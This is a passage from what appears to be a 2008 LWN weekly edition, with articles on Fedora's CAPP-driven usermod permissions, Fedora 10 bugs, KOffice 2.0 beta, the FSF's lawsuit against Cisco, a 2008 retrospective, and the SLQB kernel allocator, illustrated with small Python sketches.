have been a very interesting muddle. [The process] could have gone for
years, and it could easily have gone on so many years that it impacted the
era in which really large stuff can be built in the free model. So,
overall, I think we would have got something, but, even now, the low
overhead involved and even the insight that comes from the GPL would not be
with us."


In other words, the GPL and modern computer structures are all "in
the tradition of the last few centuries. They're taking the traditions that
we saw with the industrial revolution and adding several layers of
magnitude to that flexibility." 

Bringing on The Singularity

Although speculation is part of Vinge's stock in trade as an SF novelist,
he is cautious about predicting the future. "I always rush to say,
'Terrible things could happen!'" he says. "A giant meteor could hit the
earth, or a civil war could happen." 


However, caution aside, Vinge does concede that "we have the tools to
keep running along the same lines for some time. And, in the absence of
disaster, it quickly runs to the point where you're talking about stuff
that's of the same significance as the rise of the human race within the
animal kingdom." In other words, the Singularity arrives.


Vinge does not offer a map of exactly how free software and its
infrastructure will lead to the Singularity. But, given the probable
inability of humans to understand super-human intelligence, he
should not be expected to do so. "It's easy to imagine," he says, "but you
run out of adjectives and high-sounding words that could mean anything to
someone like us." All that can really be said is that, as the latest
manifestation of the historical trend to increasingly complex cooperative
infrastructures, free software plays a large role in creating a future in
which the Singularity becomes increasingly inevitable.


"I think that's going to happen in the relatively near historical
future," says Vinge. "And these sorts of trends are all
consistent with that possibility." 


Meanwhile, Vinge is personally content with the improvements that have come
to free software in the last couple of years. He is particularly pleased
that you can download and install a stable and easy to use operating system
in an afternoon. "If you look back over the last ten years, you see how
easy it's become to do things," he says. "It's silly to put number to this,
but it's ten or a hundred times easier now. I can remember spending days
getting PPP to work. And now, you just plug this cable into that socket,
and it works. I feel much more able to do what I have to do without having
to worry very much, without having Catch-22s nibble me to death. Things
have really come together in a coherent and useful way."


		Fedora and CAPP


Removing the ability for regular users to execute "system" programs has a
certain appeal, but does it really provide any extra security?  A thread on
the fedora-devel mailing list explores that question in the context of
usermod (and other, similar tools), which had their permissions
changed more than two years ago in an effort to meet security certification
requirements.  Whether these changes, and at some level the certifications
themselves, actually increase the security of the system is the open question.


Callum Lerwick noticed that running
usermod no longer worked as a regular user.  He has a habit of
doing that to get a quick overview of the command syntax and options from
the help page, but unless he uses sudo, that doesn't work.  That
was done on purpose as Steve Grubb describes:

These should have been gone for quite a while...and on purpose. You cannot do 
anything with them unless you are root. Allowing anyone even to execute them 
would require lots of bad things for our LSPP/CAPP evaluations.


LSPP and CAPP are two protection profiles that are used for Common Criteria
security certifications (such as EAL3) that Red Hat Enterprise Linux (RHEL) has
earned.  Because these tools can modify trusted databases
(e.g. /etc/shadow), attempts to run them by untrusted users must
be added to the audit log in order to comply with the certifications.  But
adding audit events requires the CAP_AUDIT_WRITE capability bit; in today's
systems that effectively means setuid(0).  As Grubb puts it: "IOW, if we open the
permissions, we need to make these become setuid root so  
that we send audit events saying they failed."
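
The change under discussion comes down to a few mode bits on the binary.  As a minimal sketch (nothing here is taken from Fedora's packaging, and the helper name describe_mode is made up for illustration), the following Python reads the two bits that matter in this argument using the standard os and stat modules: whether "other" users may execute the file, and whether it is setuid.

```python
import os
import stat


def describe_mode(path):
    """Return (others_can_execute, is_setuid) for the file at path.

    Hypothetical helper for illustration only; it inspects mode bits
    and does not consult ACLs, capabilities, or SELinux policy.
    """
    mode = os.stat(path).st_mode
    others_can_execute = bool(mode & stat.S_IXOTH)  # the "x" in rwxr-x--x
    is_setuid = bool(mode & stat.S_ISUID)           # runs as the file's owner
    return others_can_execute, is_setuid
```

Calling describe_mode("/usr/sbin/usermod") on a given system would show which of the two situations Grubb describes applies there; the thread does not state the exact mode Fedora ships, so no output is shown here.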


Leaving aside the idea that only processes with root
permissions are allowed to generate auditable events—which seems a
bit bizarre—there is still the question of how much protection is
provided by changing the file permissions.  Seth Vidal asks:

And do we seriously think we can keep the code away from a non-root user 
by chmodd'ing the binaries? A user can get a binary for anything 
fedora can install in about 30s w/firefox.


Allowing users to download binaries "takes the
system out of the certified configuration", according to Grubb: "So, if you
need to be in the CAPP certified configuration, don't let users do this."  This fairly
clearly demonstrates the dubious nature of the security afforded by the
current certifications.  For the most part, the protection profiles
define away nearly all of the interesting threats that most systems face
today. 


To a large extent, CAPP/LSPP certifications are the kinds of things listed
in marketing materials for "enterprise" operating systems rather than
serious attempts to address the real security needs of the vast majority of
network-connected systems.  As part of the discussion, Grubb provides an
excellent overview of some of the requirements of CAPP, along with how they
are implemented in Fedora.  The CAPP information page gives the full story,
however:

The CAPP provides for a level of protection, which is appropriate for an
assumed non-hostile and well-managed user community requiring protection
against threats of inadvertent or casual attempts to breach the system
security. The profile is not intended to be applicable to circumstances in
which protection is required against determined attempts by hostile and
well-funded attackers to breach system security.


But CAPP does require that all attempts to modify trusted databases
like the shadow password file generate an audit trail, so there is a
lower-level audit rule set up for that file.  Any access to
/etc/shadow, for example, is logged as Grubb describes in his
overview.  That, though, raises other questions, as Lerwick points out:

So we *are* auditing low level filesystem calls? So then what, other
than security theater, does auditing execution of usermod gain us?


The answer is that auditing execution of usermod by non-root users
gains exactly one thing: CAPP compliance.  The profile requires that binaries which
modify trusted databases leave an audit trail.  Even though any actual
attempt to access the underlying file will be logged, just accessing the
binary that could modify the file is also something that must be
logged. 


Part of the dismay displayed in the thread comes from the fact that Fedora
will probably never be certified with CAPP for any number of reasons.  So
taking away longstanding user abilities for a certification that won't be
done doesn't sit well with some in the Fedora community, even though there
are reasonable alternatives like man usermod.  Still, as Jef
Spaleta notes, there might be a use for the
certification in a Fedora spin:

 Is there need for certified
'appliance' situations that a new 3rd party could leverage Fedora to
create?  I can imagine all sorts of no network software appliance
situations where the CAPP certification applies and a Fedora derived
image would be a good development target.


There is always going to be tension between the security needs of an
"enterprise" distribution like RHEL and a more user/desktop-oriented
distribution like Fedora.  While the specific reduced functionality in this
case is fairly minimal, the discussion increased the visibility of the
auditing required for certification as well as what that means for both
distributions.  The original decision was made back in the Fedora Core days
when there was much less visibility and community input into the process.
Discussions like this will only help continue the process of opening up
Fedora while also exposing some of the inadequacies of security
certifications.


		Problems with Fedora 10


LWN has received several emails regarding bugs in Fedora.  These are
serious bugs that can prevent you from installing new updates, or new
packages of any kind.  Fedora users may want to be aware of the following and, perhaps, wait until things settle down a bit.

To start things off, bug #475068
was reported for Fedora 9 with x86_64.  This bug is present in Fedora 10
and also affects x86 systems.  There was a workaround
for this bug, for Fedora 10 users, involving using yumdownloader
to install an older version of dbus.  Unfortunately the older packages
won't show up on all mirrors.  It is still possible
to recover from this bug by manually editing /etc/dbus-1/system.conf
and rebooting the system.  Fedora 9 users will need this
version of PackageKit.  For Fedora 10 you'll want this
version of PackageKit.

Bug
#475069 covers a dbus access problem with bluez.  If you are seeing the
error message: "Agent registration failed: A security policy in place
prevents this sender from sending this message to this recipient, see
message bus configuration file (rejected message had interface
"org.bluez.Adapter" member "RegisterAgent" error name "(unset)" destination
"org.bluez").", this may
help.  Fedora 9 users will want bluez-utils-3.36-3.fc9.
Fedora 10 users should grab bluez-4.22-2.fc10.
If you are still running Fedora 8 the proper package to get is bluez-utils-3.35-5.fc8.

Another bug that may be troubling you is bug #469434,
in which subnetmask settings are not saved.  For some people this has been
fixed.  That fix did not seem to work for everyone though.  The system-config-network-1.5.94-2.fc10
update does seem to work.

If you run into the error "PackageKit failed to get a TID" you will want to
see this forum thread; the problem affected several people on December 7,
2008.  So far, no fix seems to be forthcoming.


Bugs in PackageKit are especially troubling for some, since you can't
install an update using the GUI tools.  Your editor completed a fresh
install of Fedora 10 last weekend on an aging Thinkpad laptop.  After the
usual update she could no longer find or update any packages.  A manual
yum update did not help.  It would appear that bug #475656
addresses the error "failed to get a TID: A security policy in place
prevents this sender from sending this message to this
recipient...".  No doubt a SELinux expert could edit the offending
policy.  The rest of us will have to wait for a fix.

Editor's note: as noted in the comment below, this is a DBus security problem and has nothing to do with SELinux.  This last bug was reported December 9, and by December 10 a fix was already being tested.


		A look at KOffice 2.0 Beta 3


The KDE office application suite, KOffice, is getting closer to its 2.0
release.  Beta 3 was announced
November 19, with another beta due any day.  The final release is expected
early next year, so it seems like a good time to take it for a spin.


The beta releases are available for Kubuntu
Intrepid Ibex (8.10), making it relatively easy to try out.  There are
also openSUSE and Debian packages available as well as source code (of
course).  The author didn't look forward to trying to build KOffice on his
normal Fedora 9 desktop, so borrowing an Intrepid laptop from the wife was in
order; after that enabling the "Unsupported Updates" and installing the
koffice-kde4 package (which didn't seem to work through the GUI, but
apt-get worked just fine) is all that it took.


The initial impression was a bit rocky as most of the small handful of ODF
files that were 
opened caused KOffice to crash.  It is a beta, though, so some of that is
to be expected.  Trying again with the imminent Beta 4 and filing bugs for
failures should be high on the author's list.  The one presentation file
that successfully opened in KPresenter seemed to have lost much of the
formatting that was present in the original, which was also disheartening. 


It should be noted that the author is hardly an office suite "power user".
Normally, OpenOffice.org is used for minimal business documents (invoices
mainly), simple spreadsheets (expense reports, football pools), and boring,
bullet-list slides for 
presentations (as anyone who has been to one will attest).  By and large,
these simple needs are met by OpenOffice, with the added bonus of being
mostly able to open the various Microsoft-format documents that
unfortunately cross the desktop.  Any other office suite with similar
capabilities would serve just as well.


Opening spreadsheets in KSpread provided the most reliable experience when
opening existing documents, but there were still a number of problems.
Formulas did not calculate automatically regardless of the auto-recalculate
setting, but the data was there, unlike some of the other document types.
KWord seemed to be unable to open any of the ODF documents tried, crashing
in all cases.  One "handy" .doc file opened, but the formatting and
contents were mangled; OpenOffice can reproduce the formatting of that
document pretty well.  KWord also crashed on exit from that
document. Perhaps betas are not the place to try opening 
existing files.


There clearly are many new features
in KOffice 2.0, but the major ones, porting to KDE4/Qt4 and using the Flake object
library throughout, are infrastructural in nature—they aren't
obvious to users.  Much like KDE 4.0, it would appear that KOffice 2.0 is a
launching pad for subsequent releases. 


There is an emphasis on a consistent user interface between the various
applications which does stand out when using KOffice.  For better or worse,
the OpenOffice interface is fairly consistent between applications as well,
but seems more cluttered, or more poorly organized somehow.  Using Flake
everywhere will be a boon to those who are power users as it treats
everything as a "shape" that can be transformed (via scale, rotate, skew) and
moved between any of the separate applications.  Vector graphics can
cohabitate with raster graphics and text easily.


Using KOffice 2.0 is fairly straightforward for simple tasks.  It is
noticeably slower than OpenOffice on the same hardware.  Opening files,
even empty documents, seems to take an inordinate amount of time.  Even
moving around within KSpread or KWord seemed sluggish.
Presumably these are things that will be fixed; whether that will be in the
next few months or for KOffice 2.1 remains to be seen.  This beta gives the
impression of great promise, but not yet a very usable tool.


Of course, there is more to KOffice than just the three applications
mentioned.  The database application Kexi is not yet part of the KOffice
2.0 release, nor is the Visio-like flowchart program Kivio.  Two drawing
applications, Karbon14 for vectors and Krita for raster graphics, have been
released with the beta.  Other than a quick startup to see if the interface
was consistent with the rest of the suite—it was—the author
didn't try them.  The same goes for KPlato, the project management and
planning application, though it has a rather different look—no
toolboxes on the right hand side—likely because of its very different
needs. 


Perhaps unfairly, the author expected a bit more from this beta release.
It would seem there is still a fair amount of work to do before the final
2.0 version, but there are still a few months left.  For whatever reason,
previous attempts to use KOffice had always caused the author to quickly
switch back to OpenOffice.  Even though there were so many problems, this
KOffice—or more likely 2.1—somehow seems more plausible to
switch to.  Another look in a few more months is likely called for.


		The FSF raises the stakes for Cisco


On December 11, the Free Software Foundation announced the filing of a
GPL-infringement lawsuit against Cisco.  This action represents another step
in a long series of license-compliance issues involving Cisco and its
subsidiaries.  It 
may look like just another licensing lawsuit, but it represents an
interesting step in the evolution of attitudes toward compliance with the
GPL.  The eventual outcome is fairly predictable, but the process is still
worth watching.

Cisco does look like a serial offender with regard to the GPL.  Most of its
problems in this area were actually acquired with its purchase of Linksys;
routers made by Linksys have been followed by GPL issues since at
least 2003.  Over those years, a fairly consistent pattern has developed: a
new Linksys product is released which, upon inspection, is determined to be
running GPL-licensed software.  There is no corresponding source release,
which is a clear violation of the GPL.  After a series of contacts and
negotiations, some of the copyright holders involved succeed in getting a
source release - though that release is not always as complete as it should
be.  The problem appears to be solved - until the next product comes out.

The sad part is that there is almost certainly no real desire on the part
of Cisco or Linksys to violate the GPL.  The company is being set up for
trouble by its suppliers - the firms based in the far east which actually
make the hardware sold under the Linksys name.  Those suppliers feel,
perhaps with good reason, that they need not concern themselves with the details
of license compliance.  There is not, after all, much of a history of
successful license enforcement in that part of the world.  So they deliver
an infringing product which Cisco then resells; it could well be that Cisco honestly
has no idea that those products incorporate software in
violation of its license.  Of course, it could also be that Cisco does not
really want to know about such problems.

Nameless original equipment manufacturers in China are a difficult target
for those who would enforce the GPL; a high-profile American company is
clearly easier game.  Beyond that, though, Cisco is a legitimate target for a lawsuit:
the company is distributing GPL-licensed software without making the source
available.  It is also an appealing target because Cisco is in a
position to apply pressure on those nameless suppliers: if a company of
that size refuses to resell equipment which does not come with
fully-licensed software (whether free or proprietary), its suppliers will
learn to pay attention.  The FSF is arguing, in essence, that it is Cisco's
responsibility to put a program in place to ensure that its suppliers are
delivering properly-licensed software.  It is Cisco which should be finding
licensing problems in its products, not the owners of the code it is using.

The complaint
[PDF] describes a long series of meetings with Cisco.  Several times,
the complaint says, "Defendant corresponded with Plaintiff
repeatedly regarding the matter and Plaintiff believed in good faith that a
satisfactory resolution of its concerns could be reached."  But then
more problems always turned up.  So, after a few years, the FSF has given
up:


	Given Defendant's extensive history of violating Plaintiff's
	Licenses, Plaintiff considers Defendant's current and proposed
	activities insufficient to ensure Defendant's future compliance.
	Defendant has refused to meet several of Plaintiff's reasonable
	requirements for reinstatement of Defendant's right to distribute
	the Programs. Defendant has not demonstrated that it has
	meaningfully improved its software review process which failed to
	prevent previous violations, or that it intends to do so. Defendant
	has refused to acknowledge its previous violations or inform the
	users who received Infringing Products of its omissions. And
	Defendant has refused to provide regular compliance reports to
	Plaintiff regarding Defendant's pervasive exploitation of
	Plaintiff's software. Nonetheless, Defendant continues to
	distribute the Infringing Products and Firmware in violation of
	Plaintiffs' exclusive rights under the Copyright Act.


The complaint alleges that Cisco is guilty of copyright infringement.  The
court is asked to provide injunctive relief - taking the offending products
off the market.  The FSF is also asking for damages, attorney's fees, and
"all profits derived by Defendant from its unlawful acts."

All this would be a heavy price for Cisco to pay.  And it could well be
that a court would go along with most of these requests.  The fact of the
matter, though, is that things are unlikely to get that far.  Unlike, say,
SCO, Cisco has not made any statements about the validity of the GPL.  It
is an active contributor to GPL-licensed projects, including the Linux
kernel.  Cisco's behavior looks more like negligence than malice.  This
suit will probably get the attention of people in very high levels of
management at Cisco; they, in turn, will almost certainly come to the table
and find a way to make the FSF go away.  There is no value for them in any
other course of action.

So this episode will blow over, probably within a few months.  But there
are still a couple of interesting things to note here.  One is that the
Linux kernel is not involved in this suit at all, and neither is Busybox.
Those two projects have been at the center of most GPL-enforcement actions
thus far.  The FSF, though, is focusing on projects that it owns: glibc,
GCC, coreutils, binutils, gdb, and wget.  That widens the scope somewhat,
showing that GPL compliance is not just required for a small number of
programs.

Incidentally, all of the code at issue in this suit is licensed under
GPLv2; version 3 of the license is not part of this action.

This suit also marks a bit of a change for the FSF, which, traditionally,
has strongly favored quiet resolution of GPL-compliance issues.  It seems
that even the FSF has a point where its patience runs out.  It may also be
that the influence of the Software Freedom Law Center, which appears to be
rather more willing to go to court, is being felt at the FSF.  In any case,
it is reasonable to expect that the FSF might find itself involved in more
legal actions in the future.

This lawsuit will doubtless be used by people to show how use of
GPL-licensed software can create risks for companies.  The truth is more
straightforward, though.  Use of any copyrighted material without an
accompanying license is generally against the law; incorporating such
material into products will always be a risky thing to do.  There is
nothing special about the GPL in that regard.

		The Grumpy Editor's 2008 retrospective


Holidays are an exercise in tradition.  One of the more charming holiday
traditions around LWN is to look at the predictions made at the beginning
of the year and measure them against reality.  There is, after all, great
value in things which make us laugh.  This year's predictions were featured
in the January 3, 2008
edition.  As might be expected, some of them were better than others.

What was predicted

Your editor's first prediction was that support for Flash playback would
mature in 2008.  In some sense, that may be true.  Your editor's desktop
system, running the Rawhide build of Gnash, can now faithfully display a
wide variety of Flash ads, web site "intros," and various other thoroughly
useless bits of media.  A Flash-based "interactive tour" offered by LWN's
bank worked nicely.  But support for many other Flash features, including
audio and 
simple playback from online sites, still is not especially solid, and other
interactive Flash applications do not work at all.  This problem, it seems,
is still not solved.

The prediction of the KDE 4.0 release required little in the way of
foresight, as did the prediction that users would be unhappy.  That stage
was well set before the beginning of the year.  A continued focus on power
management was also an easy thing to foresee; there will be great value in
making our systems more power-efficient into the indefinite future.

Flush from those two obvious successes, your editor went off and stated
that the bulk of the realtime tree would be merged into the mainline kernel
by the end of the year.  Oh well.  Your editor should know by now that
expecting deterministic merge times for realtime patches is a sure path to
disappointment; latencies in this area are always higher than one would
like.  In this case, the realtime developers got stuck in a 
high-priority interrupt (taking over the x86 architecture) with the result
that realtime work got preempted and suffered from severe starvation.

As predicted, debate over Microsoft's OOXML format continued, and Microsoft
succeeded in obtaining standard status for that format anyway.  Things have
since gotten quieter, though, perhaps because people see it as a done deal
and no longer worth fighting about.

The GPL was the subject of two predictions this year.  One was that more
projects, perhaps even glibc, would move to GPLv3.  There is a steady
stream of analyst verbiage to the effect that GPLv3 is quickly growing in
popularity (example),
but the truth of the matter is that the number of conversions in projects
which really matter appears to be low.  Projects with significant numbers
of developers and users continue to approach GPLv3 with caution.

The other prediction was that GPL enforcement actions would continue, and
perhaps grow.  The recent FSF lawsuit against Cisco makes it clear that the
GPL enforcers are serious about what they are doing.  Your editor cannot
help but wonder, though, whether the increasingly litigious actions by the
Software Freedom Law Center might not eventually lead to a serious backlash
within the community.  We are about freedom, not punitive damages.
Enforcement of the GPL is necessary if we expect our licenses to be taken
seriously, but overly zealous - or greedy - litigation could encourage
those who say that 
use of free software exposes companies to an unacceptable level of risk.

Your editor included a rosy prediction about the One Laptop Per Child
project and where it would go over the course of the year.  In fact, OLPC
has continued to work toward its goal of putting laptops into the hands of
children around the world.  But your editor completely missed the way
internal divisions would rise to the surface and distract OLPC developers
from what they are trying to do.  OLPC seems to have moved beyond the worst
of that, and much-needed development on the Sugar software continues.  But
the project seems far from its original goals, and the increasing
popularity of ultra-mobile systems, while vindicating the original vision
behind the OLPC hardware, threatens to render the XO hardware obsolete and
irrelevant. 


Ever the optimist, your editor said that the days of hardware hassles would
be over.  We are closer.  Finding an off-the-shelf system - server,
desktop, laptop, or palmtop - which is fully supported by Linux is now
easily done.  OK, maybe the modem is not supported, but few people will be
inconvenienced by that omission anymore.  That said, there will probably
never be a shortage of uncooperative hardware manufacturers; if we value
our free operating system, we must continue to
support manufacturers who work with our community, and avoid those which do
not.


The prediction that the intensity of competition between distributors would
increase was reasonably well satisfied.  One need only look at Novell's
"migrate from Red Hat" offering or the continued attacks on Ubuntu, not all
of which have to do with its community participation.

Finally, the three "community" predictions at the end of last January's
article were all satisfied reasonably well.  None of them were especially
daring, so that should not be surprising.

What was not predicted

One commenter in January asked about the lack of predictions about SCO.  In
December, it is hard to say that SCO deserved a place there.  The company
still exists in some form, but it no longer has much to warrant the
attention of the Linux community.  Your editor predicts that there will be
no SCO predictions in 2009 either.

So what else did your editor miss?  Perhaps at the top of the list is the
evolution of the Linux platform as it is used in mobile devices, and in
cellular telephones in particular.  Google's (unpredicted by your editor)
Android platform has made a splash, regardless of what one might think of
its openness.  The first Android phone has been reasonably well received,
and it would appear that more are on the way.  The merger of the LiPS and
LiMo consortia shows that some consolidation is happening in this area.
The announced plans to open Symbian were also an interesting development.
In the near future, the handset business seems likely to be firmly
dominated by free software - though, alas, the bulk of those handsets will
not be designed to pass the benefits of that freedom on to their owners.

Your editor has often predicted software patent troubles, though he did not
do so in 2008.  What was completely unforeseen, though, was Red Hat's resolution
with Firestar Software.  The company got itself out of a patent bind, and,
in the process, removed the patent as a threat to the wider development and
user community too.  We may see this sort of solution repeated for patent
problems in the future - if we are lucky.

Finally, unpredicted - and unpredictable - was the series of
"infrastructure issues" which shut down much of the Fedora project for a
good month.  That episode showed us a number of things: how much some of us
depend on our distributors' infrastructure, how vulnerable we can be to
intrusions, and how the interests of the companies behind some
distributions can interfere with the availability of useful information.
Months after the fact, we still have no idea what happened with the Fedora
project; it is not unreasonable to wonder if we will ever know.

Despite problems like that, and other small distractions (the total
meltdown of the global financial system, for example), Linux has only grown
stronger over the last year.  Our community has grown, our software has
gotten better, and the economy around free software has gotten stronger.
Your editor predicted that, too, but not even he is so arrogant as to claim
credit for having foreseen something nearly as obvious as the sunrise.

		SLQB - and then there were four


The Linux kernel does not lack for low-level memory managers.  The
venerable slab allocator has been the engine behind functions like
kmalloc() and kmem_cache_alloc() for many years.  More
recently, SLOB was added as a pared-down allocator suitable for systems
which do not have a whole lot of memory to manage in the first place.  Even
more recently, SLUB went in
as a proposed replacement for slab which, while being designed with very large
systems in mind, was meant to be applicable to smaller systems as well.  The consensus
for the last year or so has been that at least one of these allocators is surplus
to requirements and should go.  Typically, slab is seen as the odd
allocator out, but nagging doubts about SLUB (and some performance
regressions in specific situations) have kept slab in the game.

Given this situation, one would not necessarily think that the kernel needs
yet another allocator.  But
Nick Piggin thinks that, despite the surfeit of low-level memory managers,
there is always room for one more.  To that end, he has developed the SLQB allocator which he hopes to
eventually see merged into the mainline.  According to Nick:


	I've kept working on SLQB slab allocator because I don't agree with
	the design choices in SLUB, and I'm worried about the push to make
	it the one true allocator.


Like the other slab-like allocators, SLQB sits on top of the page allocator
and provides for allocation of fixed-sized objects.  It has been designed
with an eye toward scalability on high-end systems; it also makes a real
effort to avoid the allocation of compound pages whenever possible.
Avoidance of higher-order (compound page) allocations can improve
reliability significantly when memory gets tight.

While there is a fair amount of tricky code in SLQB, the core algorithms
are not that hard to understand.  Like the other slab-like allocators, it
implements the abstraction of a "slab cache" - a lookaside cache from
which memory objects of a fixed size can be allocated.  Slab caches are
used directly when memory is allocated with kmem_cache_alloc(), or
indirectly through functions like kmalloc().  In SLQB, a slab
cache is
represented by a data structure which looks very approximately like the
following:


[Diagram: the kmem_cache structure and its per-CPU kmem_cache_cpu lists]

(Note that, to simplify the diagram, a number of things have been glossed over.)


The main kmem_cache structure contains the expected global
parameters - the size of the objects being allocated, the order of page
allocations, the name of the cache, etc.  But scalability means separating
processors from each other, so the bulk of the kmem_cache data
structure is stored in per-CPU form.  In particular, there is one
kmem_cache_cpu structure for each processor on the system.

Within that per-CPU structure one will find a number of lists of objects.
One of those (freelist) contains a list of available objects; when
a request is made to allocate an object, the free list will be consulted
first.  When objects are freed, they are returned to this list.  Since this
list is part of a per-CPU data structure, objects normally remain on the
same processor, minimizing cache line bouncing.  More importantly, the
allocation decisions are all done per-CPU, with no bad cache behavior and
no locking required beyond the disabling of interrupts.  The free list is
managed as a stack, so allocation requests will return the most recently
freed objects; again, this approach is taken in an attempt to optimize
memory cache behavior.
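
The stack discipline described above can be illustrated with a toy model.  This is only a sketch in Python, not kernel code; the class and method names are invented for the illustration, and the fallback to the page allocator is left out.

```python
class PerCPUFreeList:
    """Toy model of one CPU's free list (hypothetical names, not SLQB code)."""

    def __init__(self):
        self.freelist = []  # used strictly as a stack

    def free(self, obj):
        # A freed object goes on top of the stack.
        self.freelist.append(obj)

    def alloc(self):
        # The most recently freed object is handed out first, since it is
        # the one most likely to still be in this CPU's cache.
        if self.freelist:
            return self.freelist.pop()
        return None  # a real allocator would fall back to a page here


cache = PerCPUFreeList()
for name in ("a", "b", "c"):
    cache.free(name)
first = cache.alloc()
second = cache.alloc()
```

Here "c" was freed last, so it is the first object to be allocated again.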

SLQB gets its memory in the form of full pages from the page allocator.
When an allocation request is made and the free list is empty, SLQB will
allocate a new page and return an object from that page.  The remaining
space on the page is organized into a per-page free list (assuming the
objects are small enough to pack more than one onto a page, of course), and
the page is added to the partial list.  The other objects on the
page will be handed out in response to allocation requests, but only when
the free list is empty.  When the final object on a page is allocated, SLQB
will forget about the page - temporarily, at least.

Objects are, when freed, added to freelist.  It is easy to foresee
that this list could grow to be quite large after a burst of system
activity.  Allowing freelist to grow without bound would risk tying up
a lot of system memory doing nothing while it is possibly needed
elsewhere.  So, once the size of the free list passes a watermark (or
when the page allocator starts asking for help freeing memory), objects
in the free list will be flushed back to their containing pages.  Any
partial pages which are completely filled with freed objects will then
be returned to the page allocator for use elsewhere.
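
The interaction between the free list, the partial pages, and the watermark can be sketched in a few lines of Python.  This is a simplified model under stated assumptions, not the SLQB implementation: objects are (page, index) pairs, the pages dictionary stands in for the kernel's ability to find an object's page from its address, and a flush empties the whole free list (the real code works in batches).  All names are invented for the example.

```python
class Page:
    def __init__(self, page_id, capacity):
        self.page_id = page_id
        self.capacity = capacity
        self.free = list(range(capacity))  # per-page free list of indexes


class CPUCache:
    def __init__(self, objs_per_page=4, watermark=6):
        self.objs_per_page = objs_per_page
        self.watermark = watermark
        self.freelist = []       # per-CPU stack of freed objects
        self.partial = []        # pages which still have free objects
        self.pages = {}          # stand-in for the object-to-page lookup
        self.next_page_id = 0
        self.pages_returned = 0  # pages handed back to the page allocator

    def alloc(self):
        if self.freelist:                    # the free list comes first
            return self.freelist.pop()
        if not self.partial:                 # nothing left: get a new page
            page = Page(self.next_page_id, self.objs_per_page)
            self.next_page_id += 1
            self.pages[page.page_id] = page
            self.partial.append(page)
        page = self.partial[-1]
        index = page.free.pop()
        if not page.free:                    # fully allocated: forget it
            self.partial.pop()
        return (page.page_id, index)

    def free(self, obj):
        self.freelist.append(obj)
        if len(self.freelist) > self.watermark:
            self.flush()

    def flush(self):
        # Return objects to their containing pages; release full pages.
        while self.freelist:
            page_id, index = self.freelist.pop()
            page = self.pages[page_id]
            if not page.free:
                self.partial.append(page)    # page is partial once more
            page.free.append(index)
            if len(page.free) == page.capacity:
                self.partial.remove(page)
                del self.pages[page_id]
                self.pages_returned += 1


cache = CPUCache(objs_per_page=4, watermark=6)
objs = [cache.alloc() for _ in range(8)]  # fills two pages completely
for obj in objs:
    cache.free(obj)                       # the seventh free triggers a flush
```

With these parameters, the flush hands one completely free page back to the page allocator and leaves the other on the partial list; the eighth object simply lands on the (now short) free list.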

There is an interesting situation which arises here, though: remember that
SLQB is fundamentally a per-CPU allocator.  But there is nothing that
requires objects to be freed on the same CPU which allocated them.  Indeed,
for suitably long-lived objects on a system with many processors, it
becomes probable that objects will be freed on a different CPU.  That
processor does not know anything about the partial pages those objects were
allocated from, and, thus, cannot free them.  So a different approach has
to be taken.

That approach involves the maintenance of two more object lists, called
rlist and remote_free.  When the allocator tries to flush a
"remote" object (one allocated on a different CPU) from its local
freelist, it will simply move that object over to rlist.
Occasionally, the allocator will reach across CPUs to take the objects from
its local rlist and put them on the remote_free list of the
CPU which initially allocated those objects.  That CPU can then choose to
reuse the objects or free them back to their containing pages.

The cross-CPU list operation clearly requires locking, so a spinlock
protects remote_free.  Working with the remote_free lists
too often would thus risk cache line bouncing and lock contention, neither of
which is helpful when scalability is a goal.  That is why processors
accumulate a group of objects in their local rlist before adding
the entire list, in a single operation, to the appropriate
remote_free list.  On top of that, the allocator does not often
check for objects in its local remote_free list.  Instead, objects are
allowed to accumulate there until a watermark is exceeded, at which point
whichever processor added the final objects will set the
remote_free_check flag.  The processor owning the
remote_free list will only check that list when this flag is set,
with the result that the management of the
remote_free list can be done with little in the way of lock or
cache line contention.
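
A rough Python model may help to show how the three pieces (rlist, remote_free, and the remote_free_check flag) fit together.  It is a sketch only: a threading.Lock stands in for the spinlock, objects are (owning CPU, serial number) pairs, and the function names and watermark value are assumptions made for the illustration.

```python
import threading


class CPU:
    def __init__(self, cpu_id, remote_watermark=4):
        self.cpu_id = cpu_id
        self.freelist = []
        self.rlist = []                 # remote objects waiting to go home
        self.remote_free = []           # objects sent back by other CPUs
        self.remote_free_lock = threading.Lock()  # models the spinlock
        self.remote_free_check = False
        self.remote_watermark = remote_watermark
        self.lock_acquisitions = 0


def flush_freelist(cpu):
    """Local objects go back to their pages; remote ones queue on rlist."""
    local = [obj for obj in cpu.freelist if obj[0] == cpu.cpu_id]
    cpu.rlist.extend(obj for obj in cpu.freelist if obj[0] != cpu.cpu_id)
    cpu.freelist.clear()
    return local


def send_rlist(cpu, cpus):
    """Hand each owner its objects in one locked operation per owner."""
    by_owner = {}
    for obj in cpu.rlist:
        by_owner.setdefault(obj[0], []).append(obj)
    cpu.rlist.clear()
    for owner_id, batch in by_owner.items():
        owner = cpus[owner_id]
        with owner.remote_free_lock:
            owner.lock_acquisitions += 1
            owner.remote_free.extend(batch)
            if len(owner.remote_free) > owner.remote_watermark:
                owner.remote_free_check = True  # tell the owner to look


def claim_remote_free(cpu):
    """The owner touches remote_free only when the flag has been set."""
    if not cpu.remote_free_check:
        return 0
    with cpu.remote_free_lock:
        claimed = list(cpu.remote_free)
        cpu.remote_free.clear()
        cpu.remote_free_check = False
    cpu.freelist.extend(claimed)
    return len(claimed)


cpus = [CPU(0), CPU(1)]
# CPU 1 has freed six objects allocated on CPU 0 and one of its own.
cpus[1].freelist = [(0, n) for n in range(6)] + [(1, 0)]
local = flush_freelist(cpus[1])
early = claim_remote_free(cpus[0])   # flag not set yet: nothing to do
send_rlist(cpus[1], cpus)
claimed = claim_remote_free(cpus[0])
```

Six objects cross from CPU 1 to CPU 0 at the cost of a single acquisition of CPU 0's lock, and CPU 0 never looks at its remote_free list until the flag tells it to.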

The SLQB code is relatively new, and is likely to need a considerable
amount of work before it may find its way into the mainline.  Nick claims
benchmark results which are roughly comparable with those obtained using
the other allocators.  But "roughly comparable" will not, by itself, be
enough to motivate the addition of yet another memory allocator.  So
pushing SLQB beyond comparable and toward "clearly better" is likely to be
Nick's next task.

		System calls and 64-bit architectures


Adding a system call to the kernel is never done lightly.  It is important
to get it right before it gets merged because, once that happens, it
must be maintained as part of the kernel's binary interface forever.  The
proposal to add preadv()
and pwritev() system calls provides an excellent example of
the kinds of concerns that need to be addressed when adding to the kernel
ABI.


The two system calls themselves are quite straightforward.  Essentially,
they combine the existing pread() and readv() calls
(along with the write variants, of course) into
